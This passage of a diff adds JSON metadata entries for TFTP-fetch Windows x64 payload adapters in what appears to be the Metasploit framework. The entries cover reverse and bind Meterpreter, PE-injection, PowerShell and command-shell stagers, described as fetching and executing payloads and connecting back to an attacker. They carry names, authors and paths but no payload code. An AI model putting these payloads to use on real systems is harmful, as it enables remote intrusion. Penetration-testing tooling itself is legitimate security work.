"adapted_refname": "windows/x64/meterpreter/reverse_winhttp", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_cmd/windows/tftp/x64/meterpreter/reverse_winhttps": { + "name": "TFTP Fetch, Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter/reverse_winhttps", + "staged": true, + "stage_refname": "windows/x64/meterpreter", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_cmd/windows/tftp/x64/meterpreter_bind_named_pipe": { + "name": "TFTP Fetch, Windows Meterpreter Shell, Bind Named Pipe Inline (x64)", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter_bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "UserExistsError", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter_bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter_bind_named_pipe", + "staged": false + }, + "payload_cmd/windows/tftp/x64/meterpreter_bind_tcp": { + "name": "TFTP Fetch, Windows Meterpreter Shell, Bind TCP Inline (x64)", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter_bind_tcp", + "staged": false + }, + "payload_cmd/windows/tftp/x64/meterpreter_reverse_http": { + "name": "TFTP Fetch, Windows Meterpreter Shell, Reverse HTTP Inline (x64)", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/windows/tftp/x64/meterpreter_reverse_https": { + "name": "TFTP Fetch, Windows Meterpreter Shell, Reverse HTTPS Inline (x64)", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/windows/tftp/x64/meterpreter_reverse_ipv6_tcp": { + "name": "TFTP Fetch, Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter_reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter_reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_ipv6_tcp", + "staged": false + }, + "payload_cmd/windows/tftp/x64/meterpreter_reverse_tcp": { + "name": "TFTP Fetch, Windows Meterpreter Shell, Reverse TCP Inline x64", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/tftp/x64/peinject/bind_ipv6_tcp": { + "name": "TFTP Fetch, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/tftp/x64/peinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/peinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/tftp/x64/peinject/bind_ipv6_tcp_uuid": { + "name": "TFTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/tftp/x64/peinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/peinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/tftp/x64/peinject/bind_named_pipe": { + "name": "TFTP Fetch, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/tftp/x64/peinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/peinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/peinject/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/tftp/x64/peinject/bind_tcp": { + "name": "TFTP Fetch, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/tftp/x64/peinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/peinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/peinject/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/tftp/x64/peinject/bind_tcp_rc4": { + "name": "TFTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/tftp/x64/peinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/peinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/peinject/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/tftp/x64/peinject/bind_tcp_uuid": { + "name": "TFTP Fetch, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/tftp/x64/peinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/peinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/peinject/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/tftp/x64/peinject/reverse_named_pipe": { + "name": "TFTP Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/tftp/x64/peinject/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/peinject/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/peinject/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_cmd/windows/tftp/x64/peinject/reverse_tcp": { + "name": "TFTP Fetch, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/tftp/x64/peinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/peinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/peinject/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/tftp/x64/peinject/reverse_tcp_rc4": { + "name": "TFTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/tftp/x64/peinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/peinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/peinject/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/tftp/x64/peinject/reverse_tcp_uuid": { + "name": "TFTP Fetch, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/tftp/x64/peinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/peinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/peinject/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/tftp/x64/pingback_reverse_tcp": { + "name": "TFTP Fetch, Windows x64 Pingback, Reverse TCP Inline", + "fullname": "payload/cmd/windows/tftp/x64/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and report UUID (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/pingback_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/tftp/x64/powershell_bind_tcp": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/windows/tftp/x64/powershell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/powershell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/powershell_bind_tcp", + "staged": false + }, + "payload_cmd/windows/tftp/x64/powershell_reverse_tcp": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/windows/tftp/x64/powershell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/powershell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/powershell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/tftp/x64/powershell_reverse_tcp_ssl": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/windows/tftp/x64/powershell_reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/powershell_reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/powershell_reverse_tcp_ssl", + "staged": false + }, + "payload_cmd/windows/tftp/x64/shell/bind_ipv6_tcp": { + "name": "TFTP Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/tftp/x64/shell/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/shell/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/shell/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/tftp/x64/shell/bind_ipv6_tcp_uuid": { + "name": "TFTP Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/tftp/x64/shell/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/shell/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/shell/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/tftp/x64/shell/bind_named_pipe": { + "name": "TFTP Fetch, Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/tftp/x64/shell/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/shell/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/shell/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/tftp/x64/shell/bind_tcp": { + "name": "TFTP Fetch, Windows x64 Command Shell, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/tftp/x64/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/shell/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/tftp/x64/shell/bind_tcp_rc4": { + "name": "TFTP Fetch, Windows x64 Command Shell, Bind TCP Stager (RC4 Stage 